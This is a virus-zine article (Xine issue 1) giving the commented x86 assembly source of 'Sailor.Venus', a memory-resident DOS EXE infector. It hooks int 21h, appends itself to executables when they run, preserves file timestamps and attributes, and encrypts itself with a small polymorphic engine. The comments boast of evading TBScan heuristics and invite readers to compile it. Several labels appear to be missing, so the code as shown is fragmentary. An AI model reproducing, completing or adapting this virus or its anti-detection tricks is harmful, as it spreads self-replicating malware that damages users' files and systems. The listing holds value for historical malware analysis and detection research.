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| Xine - issue #1 - Phile 020 |
; ...once again...
; b0z0 of the iKx presents
; Sailor.Venus
; Here is the second member of my Pretty Sailors family. It's a simple EXE
; infector that infect on execute (4bh). Of course it will preserve attributes,
; time and date of creation. The virus will fill the last page with shit stuff
; and will place itself on a new one. The virus has a small polymorphic crap.
; The size of the decriptor is fixed (0fh bytes). The encryption/decryption
; routine use the ADD/SUB/XOR operations on bytes or words (randomly selected)
; with a random value. When operating on a byte/word the used register is DI
; or SI. All the code isn't everytime encrypted, infact the mutation routine
; can generate decryptors that encrypt every second (or third) byte when
; encrypting bytes and can generate decryptors that encrypt a word and leave
; clear a byte when encrypting words.
; This is my first attempt to create a small quite polymorphic engine, and
; i promise that the next time it will be smaller, not as scannable as this,
; and also a little more poly. :)
; have phun!
; To compile:
.model tiny
assume cs:@code
org 0h
;; this code will be overwritten by the decryptor - FG use only ;;
tempzone db 0dh dup (90h)
push cs
pop ds
;; here finish the overwritten code ;;
call install_in_memory ;let's go
push es
pop ds
mov ax,es ;vic_cs points on old proggy
add ax,10h
add cs:[vic_cs],ax
cli ;restore old ss:sp
mov sp,word ptr cs:[vic_sp]
add ax,word ptr cs:[vic_ss]
mov ss,ax
sub ax,ax ;put zeros in regs
sub dx,dx
xor bx,bx
sub cx,cx
xor di,di
sub si,si
db 0eah ; jmp far to the old program
vic_ip dw 00000h
vic_cs dw 0fff0h ; for the first gen go to PSP:00h -> int 20h
vic_sp dw ?
vic_ss dw ?
push es
push cs
pop ds
mov ax,6b2dh ; check if we are resident
int 21h
cmp ah,al
je go_away
push es
mov ax,3521h ; get int 21 adress
int 21h
mov word ptr [old_int21_off],bx ;store int21 offset
mov word ptr [old_int21_seg],es ; and segment
pop es
mov ax,es ; es=psp
dec ax ; psp-1=mcb
mov ds,ax ; DS = segment of programs mcb
sub si,si
l4mcb: ; look for last mcb in chain
cmp byte ptr [si],'Z' ; is the last?
je last
inc ax
add ax,word ptr [si+03h] ; nope, search for last
mov ds,ax
jmp l4mcb
sub word ptr [si+03h],code_size_para ; = mcb+03h
add ax,word ptr [si+03h]
sub word ptr [si+12h],code_size_para ; = psp+02h
inc ax ; AX first usable segment
sub di,di ; di=0
push cs
pop ds ; ds points on code
mov cx,(code_size+1)/2
mov es,ax ; es points on our usable segment
lea si,start_code ; si points on our code
rep movsw ; move virus
push es
mov ax,2621h ; install our interrupt handler
dec ah
pop ds ; get mem segment where we are located
mov dx,[offset int21_handler]
int 21h
pop es
cmp ax,6b2dh ; internal admin stuff :)
jne no_check
sub ah,3eh
push bx
mov bx,4b00h
cmp ax,bx ; execute
pop bx
je exec
jmp cs:old_int21
mov al,03h
old_int21 label dword
old_int21_off dw ? ;original int21 offset
old_int21_seg dw ? ;original int21 segment
ourname db 0,'Sailor.Venus',0
author db '-b0z0/iKx-',0
push si
push di
push ax
push bx
push cx
push dx
push ds
push es
push bp
push ds
push dx
mov ax,3524h ;get int24h seg and off
int 21h
mov word ptr cs:[old_int24_off],bx ;store them
mov word ptr cs:[old_int24_seg],es
lea dx,int24_handler ;set our int24h handler
mov ax,2524h
int 21h
pop dx
pop ds
mov ax,4300h ;get file attributes
int 21h
push ds ;save ASCIIZ string with file name
push dx
push cx ;save attributes
xor cx,cx ;delete attributes
call set_attr
mov ax,3d02h ;open for r/w
int 21h
jnc infectit
jmp exit_infect
mov bx,ax ;bx file handle
push cs
pop ds
mov ax,5700h ;get time/date
int 21h
push dx ;store them
push cx
mov ah,3fh ;read da head
mov cx,1ch
lea dx,exehead
mov si,dx
int 21h
cmp byte ptr [si],'M' ;is exe?
je is_exe
jmp not_exe
cmp byte ptr [si+01h],'Z' ;is exe?
jne nopein
cmp byte ptr [si+18h],'@' ;winexes?
je nopein
cmp word ptr [si+12h],'VS' ;sailorvenus marker?
je nopein
cmp word ptr [si+1ah],00h ;internal ovl?
jne nopein
mov cx,word ptr [si+02h]
mov ax,512
sub ax,cx
push ax
mov al,02h ;go to the end of the file
call movefile
call normal ;check if _really_ no overlays
pop cx
cmp dx,word ptr [lendx] ;compare lseek length with
ja nopein ;length of image that will
cmp ax,word ptr [lenax] ;be loaded by the loader
ja nopein
add ax,cx ;add our alignment bytes
adc dx,00h
push ax
push dx
mov ah,40h ;write some shit to align
mov dx,0f00h ;from ds:0f00 :)
int 21h
mov word ptr [si+02h],00h
mov cx,word ptr [si+14h] ;store old IP
mov vic_ip,cx
mov cx,word ptr [si+16h] ;store old CS
mov vic_cs,cx
mov cx,word ptr [si+10h] ;store old SP
mov vic_sp,cx
mov cx,word ptr [si+0eh] ;store old SS
mov vic_ss,cx
pop dx
pop ax
push ax
push dx
mov cx,10h
div cx
sub ax,word ptr [si+8h]
mov word ptr [si+16h],ax ;new CS
mov word ptr [si+14h],dx ;new IP (will be zero)
add dx,offset ourstack ;SP after us
mov word ptr [si+0eh],ax ;new SS
mov word ptr [si+10h],dx ;new SP
pop dx ;length
pop ax
add ax,code_size
adc dx,00h
mov cx,512
div cx
inc ax
mov word ptr [si+04h],ax ;new nr of pages
mov word ptr [si+02h],dx ;new image mod 512
mov word ptr [si+12h],'VS' ;marker
push ds
push si
mov ax,08d00h ;some free (? :) ) mem
mov es,ax
sub di,di
mov si,di
mov cx,code_size
push cx
rep movsb ;copy virus in a piece of mem
call muta ;mutate a little our code
mov ah,40h ;write virus at end
pop cx
sub dx,dx
int 21h
pop si
pop ds
mov al,00h ;move at begin
call movefile
mov ah,3fh ;write new exe header
inc ah
mov cx,1ch
mov dx,si
int 21h
pop cx ;old date/time
pop dx
mov ax,5601h ;restore old date time
inc ah ;don't warn tbscan heuristic
int 21h
mov ah,3eh ;close file
int 21h
pop cx
pop dx
pop ds
call set_attr
mov ax,2524h
mov dx,cs:[old_int24_off]
mov ds,cs:[old_int24_seg]
int 21h ; restore int24h
pop bp
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
pop di
pop si
jmp cs:old_int21
push ax ;calculate lenght of loaded
push dx ;image from header
mov cx,word ptr [si+04h]
mov ax,512
mul cx
add ax,word ptr [si+02h]
adc dx,00h
mov word ptr [lenax],ax
mov word ptr [lendx],dx
pop dx
pop ax
movefile: ;move through the file
mov ah,42h
cwd ;cx=dx=00h
sub cx,cx
int 21h
set_attr: ;set attributes to CX
mov ax,4201h ;set attributes
inc ah ;g'bye tbscan F flag
int 21h
; input es:00h
; the mutation routine will be something like:
; mov di/si,length_decryptor
; mov cx,length_encrypted_code
; add/sub/xor byte/word ptr cs:[di/si],_immediate_
; inc (di/si)/nop (always inc when working with words)
; inc (di/si)/nop
; inc di/si
; loop dec
push bx
lea si,enc_value ;si on encryption value
mov bx,9047h ;bh=NOP bl=INC [DI]
;just a little optimized ;)
in al,40h ;rnd value
mov byte ptr [si],al ;encryption value
mov dl,046h
mov byte ptr [si-3],2eh ;write the CS:
mov cx,offset enctable ;select the enc method
mov di,[si+02fh] ;si+2fh --> encselected
push di
add di,cx
mov ch,[di]
mov byte ptr [si-1],ch
pop cx
shr cx,1
jnc isadi
mov byte ptr [si-9],0beh ;on decryptor
mov byte ptr [si+3],dl ;SI used
cmp byte ptr [si+1],bh
je nosecondinc
mov byte ptr [si+1],dl
cmp byte ptr [si+2],bl
jne finchanges
mov byte ptr [si+2],dl
jmp finchanges
mov byte ptr [si-9],0bfh ;the selected instruction
mov byte ptr [si+3],bl ;need DI operands
cmp byte ptr [si+1],bh
je notwoincs
mov byte ptr [si+1],bl
cmp byte ptr [si+2],dl
jne finchanges
mov byte ptr [si+2],bl
push si
mov cx,length_dec
sub di,di
sub si,09h ;si on decryptor
rep movsb ;copy the decryptor
pop si
push di
mov byte ptr [si-3],bh ;no CS: in the encryptor
mov di,offset dectable ;select the right encryptor
mov cx,[si+02fh]
sub di,cx
mov ch,[di]
mov byte ptr [si-1],ch
dec word ptr [si+02fh] ;rotate trought the pox enc.
jnz notcicle
mov word ptr [si+02fh],07h
pop di
push es
pop ds ;ds on code to be encrypted
push si
push di ;di=si, so any encryption will
pop si ;work correctly
jmp encryptor
mov di,length_dec
mov cx,code_size-length_dec
db 2eh ;CS:
db 80h,2dh ;the encrtption method
enc_value db 00h ;,immediate8
nop ;which bytes will we enc/decrypt
inc di
loop the_loop
pop si
push ds
push cs
pop ds
shr al,1 ;select if the next will encrypt
jc tobyte ;word or bytes
mov byte ptr [si-2],83h ;to word
mov byte ptr [si+2],bh
mov byte ptr [si+1],bl ;must be two incs
shr al,1
jc dontdo
mov byte ptr [si+2],bl ;or three
jmp letsgo
mov byte ptr [si-2],80h ;to byte
shr al,1 ;select if encrypt any byte or
jnc letsgo ;only every two
mov byte ptr [si+1],bh
pop ds
pop bx
encselected dw 07h
enctable: ;poxible enc/dec operations
db 90h
db 04h ;ADD [si]
db 05h ;ADD [di]
db 34h ;XOR [si]
db 35h ;XOR [di]
db 34h ;XOR [si]
db 2dh ;SUB [di]
db 2ch ;SUB [si]
end_code: ;anthing after this line wouldn't be in the file
old_int24_off dw ? ;original int24 offset
old_int24_seg dw ? ;original int24 segment
lenax dw ?
lendx dw ?
exehead db 1dh dup(?)
lenghtstack db 256 dup (?)
end entry_point